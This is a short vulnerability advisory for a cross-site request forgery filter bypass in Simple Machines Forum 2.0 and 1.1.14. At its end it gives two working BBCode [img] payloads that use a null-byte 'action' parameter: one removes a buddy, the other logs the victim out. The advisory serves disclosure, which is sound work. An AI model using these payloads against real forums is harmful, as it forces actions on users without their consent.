Simple Machines Forum versions 2.0 and 1.1.14 suffer from cross site request forgery filter bypass vulnerability.
8a0559495e9428e6377cc53fcdbcdc086a5fd6f4d4ff494fe38e48791be484ec
Summary
The [img] BBCode tag anti-CSRF filter can be bypassed due to incorrect
parsing of the 'action' variable; because of this it is possible to
successfully execute CSRF.
Description
Software: Simple Machines Forum (SMF)
Versions: SMF 2.0 / SMF 1.1.14
Publication date: 2011-08-23
Impact: Cross Site Request Forgery
Solution: N/A (Vendor informed)
Websec-id: ws11-15
Longer description and PoC
http://websec.ca/advisories/view/SMF_CSRF_Filter_Bypass
http://websec.mx/advisories/view/SMF_Cross_Site_Request_Forgery_Filter_Bypass
Author
Christian Yerena / A.K.A. preth00nker
cyerena [ at ] websec [ dot ] mx
POC:
POC
Elimina al usuario 102 de la lista de amigos (SMF 1.1.14):
[img]http://ejemplo.com/index.php?sa=editBuddies;remove=102;action%00=profile[/img]
Logout (SMF 2.0):
[img]http://example.com/community/index.php?action%00=logout;token[/img]